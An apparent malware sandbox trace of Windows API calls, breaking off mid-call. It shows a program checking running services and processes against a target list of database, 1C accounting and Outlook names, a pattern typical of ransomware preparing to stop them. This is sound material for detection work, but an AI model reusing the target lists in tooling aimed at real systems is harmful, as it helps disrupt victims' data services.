[0267.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0267.928] lstrlenW (lpString="nsi") returned 3 [0267.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0267.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0267.928] lstrlenW (lpString="PcaSvc") returned 6 [0267.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0267.928] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0267.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0267.928] lstrlenW (lpString="PlugPlay") returned 8 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0267.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0267.929] lstrlenW (lpString="Power") returned 5 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0267.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0267.929] lstrlenW (lpString="ProfSvc") returned 7 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0267.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0267.929] lstrlenW (lpString="RpcEptMapper") returned 12 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0267.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0267.929] lstrlenW (lpString="RpcSs") returned 5 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0267.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0267.929] lstrlenW (lpString="SamSs") returned 5 [0267.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0267.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0267.929] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0267.929] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0267.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0267.930] lstrlenW (lpString="Schedule") returned 8 [0267.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0267.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0267.930] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0267.930] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0267.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0267.930] lstrlenW (lpString="SENS") returned 4 [0267.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0267.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0267.930] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0267.930] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0267.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0267.930] lstrlenW (lpString="ShellHWDetection") returned 16 [0267.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.930] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0267.930] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0267.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0267.930] lstrlenW (lpString="Spooler") returned 7 [0267.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0267.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0267.930] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0267.930] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0267.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0267.930] lstrlenW (lpString="SysMain") returned 7 [0267.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0267.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0267.931] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0267.931] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0267.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0267.931] lstrlenW (lpString="Themes") returned 6 [0267.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0267.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0267.931] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0267.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0267.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0267.931] lstrlenW (lpString="TrkWks") returned 6 [0267.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0267.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0267.931] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0267.931] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0267.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0267.931] lstrlenW (lpString="UxSms") returned 5 [0267.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0267.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0267.931] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0267.931] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0267.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0267.931] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0267.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3cc [0267.932] Process32FirstW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.932] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.932] lstrlenW (lpString="System") returned 6 [0267.933] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0267.933] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0267.933] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.933] lstrlenW (lpString="smss.exe") returned 8 [0267.933] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0267.933] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0267.933] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.933] lstrlenW (lpString="csrss.exe") returned 9 [0267.933] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.934] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.934] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.934] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.934] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.934] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.934] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.934] lstrlenW (lpString="wininit.exe") returned 11 [0267.934] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0267.934] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0267.934] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.934] lstrlenW (lpString="csrss.exe") returned 9 [0267.934] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.934] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.935] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.935] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.935] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.935] lstrlenW (lpString="winlogon.exe") returned 12 [0267.935] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0267.935] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0267.935] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.935] lstrlenW (lpString="services.exe") returned 12 [0267.935] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0267.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0267.935] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0267.935] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0267.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0267.936] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0267.936] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0267.936] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.936] lstrlenW (lpString="lsass.exe") returned 9 [0267.936] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0267.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0267.936] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0267.936] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0267.936] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0267.936] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0267.936] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0267.936] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0267.936] lstrlenW (lpString="lsm.exe") returned 7 [0267.936] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0267.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0267.936] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0267.936] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0267.936] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0267.936] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0267.936] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0267.937] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.937] lstrlenW (lpString="svchost.exe") returned 11 [0267.937] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.937] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.937] lstrlenW (lpString="svchost.exe") returned 11 [0267.937] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.937] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.937] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.938] lstrlenW (lpString="svchost.exe") returned 11 [0267.938] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.938] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.938] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.938] lstrlenW (lpString="svchost.exe") returned 11 [0267.938] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.939] lstrlenW (lpString="svchost.exe") returned 11 [0267.939] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.939] lstrlenW (lpString="audiodg.exe") returned 11 [0267.939] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.939] lstrlenW (lpString="svchost.exe") returned 11 [0267.939] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.939] lstrlenW (lpString="svchost.exe") returned 11 [0267.939] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0267.940] lstrlenW (lpString="userinit.exe") returned 12 [0267.940] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.940] lstrlenW (lpString="dwm.exe") returned 7 [0267.940] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.940] lstrlenW (lpString="explorer.exe") returned 12 [0267.940] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.940] lstrlenW (lpString="spoolsv.exe") returned 11 [0267.941] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0267.941] lstrlenW (lpString="taskhost.exe") returned 12 [0267.941] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.941] lstrlenW (lpString="svchost.exe") returned 11 [0267.941] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0267.941] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0267.941] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0267.942] lstrlenW (lpString="reader_sl.exe") returned 13 [0267.942] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0267.942] CloseHandle (hObject=0x3cc) returned 1 [0267.942] Sleep (dwMilliseconds=0x1f4) [0268.753] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xbbdc98 [0268.953] EnumServicesStatusExW (in: hSCManager=0xbbdc98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0268.954] GetLastError () returned 0xea [0268.954] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0268.954] EnumServicesStatusExW (in: hSCManager=0xbbdc98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0268.954] CloseServiceHandle (hSCObject=0xbbdc98) returned 1 [0268.954] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0268.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.954] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0268.954] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0268.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0268.954] lstrlenW (lpString="AudioSrv") returned 8 [0268.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0268.954] lstrcmpiW 